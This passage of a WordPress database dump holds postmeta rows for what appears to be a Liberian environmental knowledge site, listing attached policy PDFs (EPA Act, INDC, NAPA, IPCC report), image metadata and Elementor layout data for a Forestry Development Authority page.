2,'_pods_cover_image','a:1:{i:0;i:573;}'),(13317,2152,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(13322,2152,'_dp_original','1707'),(13323,2152,'_edit_lock','1670324384:42'),(13324,2152,'_edit_last','42'),(13325,2153,'_wp_attached_file','2019/11/Act-creating-the-EPA-2002.pdf'),(13327,2152,'_pods_attached_document','a:1:{i:0;i:2153;}'),(13333,2154,'_elementor_controls_usage','a:0:{}'),(13334,2154,'by','EPA'),(13335,2154,'year','2013'),(13336,2154,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/initial-national-communication.pdf'),(13337,2154,'_pods_cover_image','a:1:{i:0;i:573;}'),(13338,2154,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(13343,2154,'_dp_original','2152'),(13344,2154,'_edit_lock','1670324381:42'),(13345,2154,'_edit_last','42'),(13346,2155,'_wp_attached_file','2019/11/initial-national-communication.pdf'),(13348,2154,'_pods_attached_document','a:1:{i:0;i:2155;}'),(13352,2156,'_elementor_controls_usage','a:0:{}'),(13353,2156,'by','EPA'),(13354,2156,'year','2018'),(13355,2156,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/IPCC-2018-Special-Report-1.5.pdf'),(13356,2156,'_pods_cover_image','a:1:{i:0;i:573;}'),(13357,2156,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(13362,2156,'_dp_original','2154'),(13363,2156,'_edit_lock','1670324509:42'),(13364,2156,'_edit_last','42'),(13365,2157,'_wp_attached_file','2019/11/IPCC-2018-Special-Report-1.5.pdf'),(13367,2156,'_pods_attached_document','a:1:{i:0;i:2157;}'),(13369,2158,'_wp_attached_file','2019/11/featured_marine.jpg'),(13370,2158,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:514;s:4:\"file\";s:27:\"2019/11/featured_marine.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"featured_marine-300x151.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"featured_marine-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"featured_marine-768x386.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"SM-N960U\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573731711\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.3\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:19:\"0.00049212598425197\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13371,488,'_thumbnail_id','2158'),(13372,2159,'_elementor_controls_usage','a:0:{}'),(13373,2159,'by','EPA'),(13374,2159,'year','2013'),(13375,2159,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Agenda-for-transformation.AfT_.pdf'),(13376,2159,'_pods_cover_image','a:1:{i:0;i:573;}'),(13377,2159,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(13382,2159,'_dp_original','2156'),(13383,2159,'_edit_lock','1670324508:42'),(13384,2159,'_edit_last','42'),(13385,2160,'_wp_attached_file','2019/11/Liberia-Agenda-for-transformation.AfT_.pdf'),(13387,2159,'_pods_attached_document','a:1:{i:0;i:2160;}'),(13389,2161,'_elementor_controls_usage','a:0:{}'),(13390,2161,'by','EPA'),(13391,2161,'year','2015'),(13392,2161,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-INDC-Final-Submission-Sept-30-2015.002.pdf'),(13393,2161,'_pods_cover_image','a:1:{i:0;i:573;}'),(13394,2161,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(13399,2161,'_dp_original','2156'),(13400,2161,'_edit_lock','1670324508:42'),(13401,2162,'_wp_attached_file','2019/11/featured_education_youth.jpg'),(13402,2162,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:36:\"2019/11/featured_education_youth.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"featured_education_youth-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"featured_education_youth-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"featured_education_youth-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P530\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1544981305\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.3\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13403,484,'_thumbnail_id','2162'),(13407,2161,'_edit_last','42'),(13408,2164,'_wp_attached_file','2019/11/Liberia-INDC-Final-Submission-Sept-30-2015.002.pdf'),(13410,2161,'_pods_attached_document','a:1:{i:0;i:2164;}'),(13412,2165,'_elementor_controls_usage','a:0:{}'),(13413,2165,'by','EPA'),(13414,2165,'year','2008'),(13415,2165,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-NAPA-2008-1.pdf'),(13416,2165,'_pods_cover_image','a:1:{i:0;i:573;}'),(13417,2165,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(13422,2165,'_dp_original','2156'),(13423,2165,'_edit_lock','1670324218:42'),(13424,2165,'_edit_last','38'),(13425,2166,'_wp_attached_file','2019/11/Liberia-NAPA-2008.pdf'),(13426,2167,'_elementor_edit_mode','builder'),(13427,2167,'_elementor_template_type','wp-post'),(13428,2167,'_elementor_version','2.7.5'),(13429,2167,'_wp_page_template','default'),(13430,2167,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f335f32\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cb943b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3fed2f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13433,2168,'_elementor_edit_mode','builder'),(13434,2168,'_elementor_template_type','wp-post'),(13435,2168,'_elementor_version','2.7.5'),(13436,2168,'_wp_page_template','default'),(13437,2168,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f335f32\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cb943b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cb32b63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13440,2169,'_elementor_edit_mode','builder'),(13441,2169,'_elementor_template_type','wp-post'),(13442,2169,'_elementor_version','2.7.5'),(13443,2169,'_wp_page_template','default'),(13444,2169,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f335f32\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cb943b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cb32b63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13447,2170,'_wp_attached_file','2019/11/Liberia-NAPA-2008-1.pdf'),(13455,2172,'_elementor_edit_mode','builder'),(13456,2172,'_elementor_template_type','wp-post'),(13457,2172,'_elementor_version','2.7.5'),(13458,2172,'_wp_page_template','default'),(13459,2172,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The FDA is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p><p>Integrating the 3Cs approach, FDA works to Conserve and sustainably manage all forest resources to enable them continue to provision of a complete range of goods and services for the benefit of all Liberians and also contribute to poverty 